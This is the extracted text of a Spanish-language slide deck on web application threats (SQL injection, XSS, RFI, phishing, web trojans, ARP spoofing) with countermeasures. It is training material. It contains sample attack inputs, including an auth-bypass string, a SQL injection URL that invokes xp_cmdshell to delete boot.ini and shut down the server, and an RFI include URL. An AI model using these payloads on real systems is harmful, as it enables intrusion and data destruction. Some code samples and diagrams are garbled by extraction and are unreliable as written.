Seguridad en Aplicaciones Web

Amenazas Web

Chema Alonso

MS MVP Windows Server Security

chema@informatica64.com

Agenda Amenazas Web

Aplicaciones Web

Vulnerabilidades: Sql Injection

Vulnerabilidades: Cross-Site Scripting

Vulnerabilidades: RFI

Vulnerabilidades: Phising

Vulnerabilidades: WebTrojan

Vulnerabilidades: Capa 8

Aplicaciones Web

Tipos de Aplicaciones Web

Web Site público. Información destinada al público.

Intranet (ERP/CRM/Productividad) Información privada de acceso interno.

Extranet (Productividad/B2B/B2C) Información privada de acceso externo.

AlmacénDe Datos

Lógica de la AplicaciónInterfaz de Usuario(GUI)

Arquitectura Multicapa

Browser

WebServer

DCOM

WebService

BBDD

BBDDWebServer

RPC

Amenazas

Zone-h contabiliza 2.500 intrusiones Web con éxito cada día en 2004.

Se atacan todas las tecnologías Los ataques se han escalado desde el

sistema operativo a la aplicación. Ataques no masivos. Motivos:

Económicos Venganza Reto Just For Fun

Cliente - Riesgos Navegador de Internet:

Ejecuta código en contexto de usuario. Lenguajes potentes:

HTML/DHTML vbScript/JavaScript/Jscript

Programas embebidos Applets Java ActiveX Shockwave Flash

Códigos No protegidos Cifrado cliente: Atrise. Ofuscación de código.

Código y poder

El código fuente es poder Tanto para defenderse como para atacar

Compartir el código es compartir el poder. Con los atacantes y defensores

Publicar el código fuente sin hacer nada más degrada la seguridad

Por el contrario, publicar el código fuente permite a los defensores y a otros elevar la seguridad al nivel que les convenga.

Software Seguro

El software Fiable es aquel que hace lo que se supone que debe hacer.

El software Seguro es aquel que hace lo que se supone que debe hacer, y nada mas. Son los sorprendentes “algo mas” los que producen inseguridad.

Para estar seguro, debes de ejecutar solo software perfecto :-)

O, hacer algo para mitigar ese “algo mas”

Cliente - Riesgos

Ninguna protección en cliente es buenaUtilización de técnicas de MITM

AchillesBurpSuiteOdysseus…

DecompiladoresFlashJava

Lógica de Aplicación - Riesgos

Servidor Web Ejecuta código en contextos privilegiados. Lenguajes potentes Acceden a BBDD Envían programas a clientes Transferir ficheros Ejecutar comandos sobre el sistema. Soporte para herramientas de administración de

otro software. Códigos de Ejemplo

Almacén de Datos - Riesgos

SGBDLenguaje de 3ª y 4ª Generación.Soporta múltiples bases de datos.Catálogo global de datos.Ejecuta programas sobre Sistema.LOPD.Transacciones económicas. Información clave de negocio.

Vulnerabilidades: SQL Injection

Explotación del Ataque

Aplicaciones con mala comprobación de datos de entrada. Datos de usuario.

Formularios Text Password Textarea List multilist

Datos de llamadas a procedimientos. Links Funciones Scripts Actions

Datos de usuario utilizados en consultas a base de datos.

Mala construcción de consultas a bases de datos.

Riesgos

Permiten al atacante:Saltar restricciones de acceso.Elevación de privilegios.Extracción de información de la Base de

DatosParada de SGBDR.Ejecución de comandos en contexto usuario

bd dentro del servidor.

Tipos de AtaquesEjemplo 1:

Autenticación de usuario contra base de datos.

Select idusuario from tabla_usuariosWhere nombre_usuario=‘$usuario’And clave=‘$clave’;

Usuario

Clave ****************

Tipos de Ataques

Ejemplo 1 (cont)

Select idusuario from tabla_usuarios

Where nombre_usuario=‘Administrador’

And clave=‘’ or ‘1’=‘1’;

Usuario

Clave

Administrador

‘ or ‘1’=‘1

Demo

Tipos de Ataques

Ejemplo 2:Acceso a información con procedimientos

de listado.

http://www.miweb.com/prog.asp?parametro1=hola

Ó

http://www.miweb.com/prog.asp?parametro1=1

Tipos de Ataques

Ejemplo 2 (cont):

http://www.miweb.com/prog.asp?parametro1=‘ union select nombre, clave,1,1,1 from tabla_usuarios; otra instrucción; xp_cmdshell(“del c:\boot.ini”); shutdown --

Ó

http://www.miweb.com/prog.asp?parametro1=-1 union select .....; otra instrucción; --

Demo

Contramedidas

No confianza en medias de protección en cliente.

Comprobación de datos de entrada.

Construcción segura de sentencias SQL.

Fortificación de Servidor Web. Códigos de error. Restricción de verbos, longitudes, etc.. Filtrado de contenido HTTP en Firewall.

Fortificación de SGBD. Restricción de privilegios de motor/usuario de acceso desde web. Aislamiento de bases de datos.

Contramedidas

Desarrollo .NETRedirigir a una página personalizada en

caso de errorWeb.Config

Mode On, Off, RemoteOnlyDefaultRedirect Error no especificado<error…>Errores específicos

<customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm"> <error statusCode="403" redirect="NoAccess.htm"/> <error statusCode="404" redirect="FileNotFound.htm"/></customErrors>

Contramedidas

Desarrollo .NET (Validadores)

Contramedidas

Desarrollos en .NET (Código inseguro) protected void Button1_Click(object sender, EventArgs e){ SqlConnection conn = new SqlConnection(connstr); conn.Open(); SqlCommand cmd = new SqlCommand(); cmd.Connection = conn; cmd.CommandText = "Select * from Usuarios where login='"+ txtLogin.Text +"‘

and password='"+ txtPassword.Text +"'"; cmd.CommandType = CommandType.Text; SqlDataReader dr = cmd.ExecuteReader(); if (dr.HasRows){ //Código para permitir el paso a la aplicación Response.Write("<script>alert('Acceso permitido');</script>"); } else{ //Codigo para rechazar el usuario Response.Write("<script>alert('Acceso denegado');</script>"); } conn.Close(); }

ContramedidasDesarrollo .NET (Código seguro)

Consultas parametrizadas protected void Button1_Click(object sender, EventArgs e){ SqlConnection conn = new SqlConnection(connstr); conn.Open(); SqlCommand cmd = new SqlCommand(); cmd.Connection = conn; cmd.CommandText = "Select * from cmd.CommandText = "Select * from Usuarios Usuarios where login=@login where login=@login

and password=@pass";and password=@pass"; cmd.Parameters.AddWithValue("login", txtLogin);cmd.Parameters.AddWithValue("login", txtLogin); cmd.Parameters.AddWithValue("pass", txtPassword.Text);cmd.Parameters.AddWithValue("pass", txtPassword.Text); cmd.CommandType = CommandType.Text; dr = cmd.ExecuteReader(); if (dr.HasRows){//Código para permitir el paso a la aplicación

Response.Write("<script>alert('Acceso permitido');</script>"); } else{//Codigo para rechazar el usuario Response.Write("<script>alert('Acceso denegado');</script>"); } conn.Close(); }

Vulnerabilidades: Cross-Site Scripting (XSS)

Explotación del Ataque

Datos almacenados en servidor desde cliente.

Datos van a ser visualizados por otros cliente/usuario.

Datos no filtrados. No comprobación de que sean dañinos al cliente que visualiza.

Riesgos

Ejecución de código en contexto de usuario que visualiza datos.

Navegación dirigidaPhisingSpywareRobo de credencialesEjecución de acciones automáticasDefacement

Tipos de Ataques

Mensajes en Foros.Firma de libro de visitas.Contactos a través de web.Correo Web.

En todos ellos se envían códigos Script dañinos.

Demo

Robo de Sesiones (XSS)

Mediante esta técnica se puede robar sesiones de una manera bastante sencilla

Bastaría con realizar un script que llamase a una página alojada en nuestro servidor pasándole la cookie

Este Script se colaría en el servidor de la victima aprovechando un punto vulnerable a XSS

Cuando un usuario este logueado en el servidor y ejecute el script se enviara a nuestro servidor el contenido de la cookie

Robo de Sesiones (XSS)

Una vez que la página obtiene la cookie (almacenandola por ejemplo en un fichero) mediante programas como Odysseus se puede hacer una llamada al servidor pasándole la cookie original

Por supuesto esta cookie es válida para robar la sesión solo mientras el usuario no cierre la sesión

Demo

Contramedidas

Fortificación de aplicaciónComprobación fiable de datos

Fortificación de ClientesEjecución de clientes en entorno menos

privilegiado.Fortificación de navegador cliente.

MBSA.Políticas.

Contramedidas

Desarrollo .NETEn ASP.NET el Cross Site Scripting está

deshabilitado por defectoEl Framework se encarga de buscar posibles

ataques de este tipo en las entradas de datosSe puede deshabilitar este tipo de verificación

mediante un atributo de la directiva @PagePara deshabilitarlo

<%@ Page … ValidateRequest=ValidateRequest=““falsefalse”” … %>

Vulnerabilidades: Remote File Inclusion (RFI)

Remote File Inclusion (RFI)

Vulnerabilidad propia de páginas PHP dinámicas que permite enlace de archivos remotos situados en otros servidores

Se debe a una mala programación o uso de la función include()

Esta vulnerabilidad no se da en páginas programadas en un lenguaje que no permita la inclusión de ficheros ajenos al servidor

Remote File Inclusion (RFI)

La vulnerabilidad es producida por código semejante a este

En páginas de este tipo se puede incluir ficheros que estén en nuestro servidor

$page = $_GET['page'];include($page);

http://victima.com/pagvuln.php?page=http://[misitio]/miFichero

Remote File Inclusion (RFI)

Existen herramientas que permite explorar un sitio Web en busca de este tipo de vulnerabilidades (rpvs)

Remote File Inclusion (RFI)

Mediante las shell PHP se pueden ejecutar comandos en una página Web

Usando RFI se puede incluir un fichero que ejecute comandos, tales como listar directorios, obtener y colocar ficheros, etc.

“El inconveniente” es que la mayoría de servidores Web en PHP tienen deshabilitadas las funciones exec, system o passthru que impiden la ejecución de comandos

Remote File Inclusion (RFI)

Sin embargo, existen funciones como show_source(‘archivo’) que permiten la visualización del código fuente de una página

A su vez, existen otra serie de funciones que nos permiten listar el contenido de un directorio

El uso de estas funciones no puede ser limitado y no depende del SO sobre el que se encuentra instalado el Servidor Web

Demo

Vulnerabilidades: Phising

Explotación del Ataque

Basado en técnicas de Ingeniería Social.

Se aprovecha de la confianza de los usuarios.

Se aprovecha de la falta de formación en seguridad de los usuarios.

Certificados digitales no generados por Entidades Emisoras de Certificados de confianza.

Riesgos

Suplantación de Sitios Web para engañar al usuario.

Robo de credenciales de acceso a web restringidos.

Robo de dinero Compras por Internet Bromas pesadas

Tipos de Ataques Se falsea la dirección de DNS del servidor

Falsificación hosts Troyanos, Físicamente, Shellcodes exploits

DHCP DNS Spoofing

Man in The Middle

Se engaña la navegación. Frames Ocultos URLs falseadas.

Se implanta en la nueva ubicación un servidor replica.

Se implantan hasta fakes de certificados digitales

Exploits

infohacking.com

Contramedidas

Uso de CA de confianzaFormación a usuariosGestión de actualizaciones de

seguridadCódigos de aplicaciones segurasControl físico de la redComprobación DHCP

Vulnerabilidades: WebTrojan

Explotación de Ataque

Servidores Web no fortificados Ejecución de programas en almacenes de ficheros.

Subida de ficheros a servidores. Imágenes para publicaciones. Archivos de informes. Currículos, cuentos, etc...

Almacenes de ficheros accesibles en remoto

Usuario en contexto servidor Web no controlado

Riesgos

Implantación de un troyano que puede:Gestionar ficherosEjecutar programasDestrozar el sistemaDefacementRobo de información ....

Tipos de Ataques

Programación de un troyano en PHP, ASP o JSP

Utilización de objetos FileObject

Subida mediante ASP Upload, FTP o RFI

Busqueda del lugar de almacenamiento

Invocación por URL pública del servidor Web

Demo

Contramedidas

Fortificación de servidores Web

Menor Privilegio Ejecución de programas en sitios restringidos Listado de directorios ocultos Usuario de servidor en contexto controlado

Subida de archivos controlada Ubicación no accesible desde URL pública Tipos de ficheros controlados

Tamaño, tipo, extensión, etc.. Filtrado vírico -> Rootkits

Contramedidas

Desarrollo .NETEn ASP.NET se puede verificar la extensión

del fichero que se sube al servidorEvita la subida de ficheros potencialmente

peligrosos

if (!FileUpload1.PostedFile.FileName.EndsWith(".jpg")){ //Error: El fichero no es del tipo esperado}

Vulnerabilidades: Capa 8

Explotación de Ataque

Falta de conocimiento SD3 Diseño Configuraciónes Implantación

Administradores/Desarrolladores no formados en Seguridad Hacking Ético

Falta de conocimiento del riesgo

Riesgos

Insospechados:

Bases de datos públicasNo protección de datosNo protección de sistemas .....

Tipos de Ataques

Hacking Google

Administradores predecibles http://www.misitio.com/administracion http://www.misitio.com/privado http://www.misitio.com/gestion http://www.misitio.com/basedatos

Ficheros log públicos WS_ftp.log

Estadísticas públicas Webalyzer

Demo

Contramedidas

Formación

Ficheros Robots Robots.txt

LOPD y LSSI www.lssi.es

Writting Secure Code

Contramedidas

¿ Preguntas ?

Troyanos

“Hay un amigo en mi”

Video

Que puede hacer un troyano

Troyano

Programa que se ejecuta en tu máquina y cuyo control no depende de ti.

Como el …..Mil formas, mil coloresLos Hackers la llaman la “girlfriend”

Obtención de Privilegios

Fallo en la cadena:Procesos:

Sistema no cerrado.Tecnología:

Fallo en sw de sistema operativoFallo en sw ejecución de códigos.

Personas: Ingeniería Social: “¡Que lindo programita!”Navegación privilegiada

Objetivos

Control remoto: Instalan “suites” de gestión del sistema.

Robo de informaciónModificación del sistema:

PhishingCreación de usuariosPlanificación de tareas ....

Instalación del Troyano

Se suele acompañar de “un caballo” para tranquilizar a la víctima.Se añaden a otro software.

EJ: WhackamoleJoiners, Binders

Incluidos en documentos que ejecutan código:

Word, excel, swf, .class, pdf, html, etc...

Instalación del Troyano

Simulando ser otro programaP2P, HTTP Servers

Paquetes Zip autodescomprimiblesProgramas con fallo de .dll

Instaladores de otro SW

Demo:

Un troyano de andar por casa pa… phisear

Demo:

Un troyano de andar por casa pa… meter un backdoor

Demo:

Un troyano de andar por casa pa… abrir una shell

Demo:

Un troyano de andar por casa pa… robar una shell

Detección de Troyanos

Anti-MallwareAntivirusAntiSpyware

Comportamiento anómalo del sistemaConfiguraciones nuevas

Cambio en páginas de navegaciónPuertos ....

Prevención contra Troyanos

Defensa en ProfundidadMínimo Privilegio PosibleMínimo punto de exposición

Gestión de updates de seguridadAntivirus/AntiSpywareEjecución controlada de programasNavegación segura

Ataque:Envenenamiento ARP

RFC 1180 - TCP/IP tutorialThere are security considerations within the TCP/IP protocol suite. To some people these considerations are serious problems, to others they are not; it depends on the user requirements. This tutorial does not discuss these issues, but if you want to learn more you should start with the topic of ARP-spoofing, then use the "Security Considerations" section of RFC 1122 to lead you to more information.

Técnicas de Spoofing

Las técnicas spoofing tienen como objetivo suplantar validadores estáticosUn Un validador estáticovalidador estático es un medio de es un medio de autenticación que permanece autenticación que permanece invariable antes, durante y después de invariable antes, durante y después de la concesión.la concesión.

Niveles AfectadosNiveles Afectados

SERVICIOSERVICIO

REDRED Dirección IPDirección IP

ENLACEENLACEENLACEENLACE Dirección MACDirección MAC

Nombres de dominioNombres de dominio

Direcciones de correo electrónicoDirecciones de correo electrónico

Nombres de recursos compartidosNombres de recursos compartidos

Tipos de técnicas de Spoofing

Spoofing ARP• Envenenamiento de conexiones.• Man in the Middle.

Spoofing IP • Rip Spoofing.• Hijacking.

Spoofing SMTP

Spoofing DNS• WebSpoofing.

Técnicas de Sniffing

Capturan tráfico de red.

Necesitan que la señal física llegue al NIC.

En redes de difusión mediante concentradores todas las señales llegan a todos los participantes de la comunicación.

En redes conmutadas la comunicación se difunde en función de direcciones.• Switches utilizan dirección MAC.

Nivel de Enlace: Spoofing ARP

• Suplantar identidades físicas.

•Saltar protecciones MAC.•Suplantar entidades en clientes DHCP.

•Suplantar routers de comunicación.

• Solo tiene sentido en comunicaciones locales.

Dirección Física

• Tiene como objetivo definir un identificador único para cada dispositivo de red.

• Cuando una máquina quiere comunicarse con otra necesita conocer su dirección física.• Protocolo ARP

• No se utilizan servidores que almacenen registros del tipo: • Dirección MAC <-> Dirección IP.

• Cada equipo cuenta con una caché local donde almacena la información que conoce.

Ataque ARP Man In The Middle

¿Quien tiene

1.1.1.2?

1.1.

1.2

esta

en

99:8

8:77

:66:

55:4

4

1.1.1.2 esta en 00:11:22:33:44:55:66

1.1.1.1

1.1.1.2

1.1

.1.1

esta

en

99:8

8:7

7:6

6:5

5:4

4

Protección contra Envenenamiento

• Medidas preventivas.

• Control físico de la red.•Bloqueo de puntos de acceso.•Segmentación de red.

• Gestión de actualizaciones de seguridad.•Protección contra Exploits.•Protección contra troyanos.

Protección contra Envenenamiento

Medidas preventivas.

• Cifrado de comunicaciones.IPSec.Cifrado a nivel de Aplicación:

• S/MIME. • SSL.

• Certificado de comunicaciones.

Medidas reactivas.

Utilización de detectores de Sniffers.

• Utilizan test de funcionamiento anómalo. Test ICMP. Test DNS. Test ARP.

Sistemas de Detección de Intrusos

Protección contra Envenenamiento

Frase vs. Passwords

●●●●●● ●●●●●● ●● ●●● ●●●● ●●●●●●● ●● ●●●●●●●●●●● ●● ●●●●●●●●●●●●●●

●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●

Web MVPs

TechNews

Suscripción gratuita enviando un mail: mailto:technews@informatica64.com

Contacto

Chema Alonsochema@informatica64.com

Informatica64http://www.informatica64.com http://www.informatica64.com/hol.htmhttp://elladodelmal.blogspot.com i64@informatica64.com +34 91 226 82 08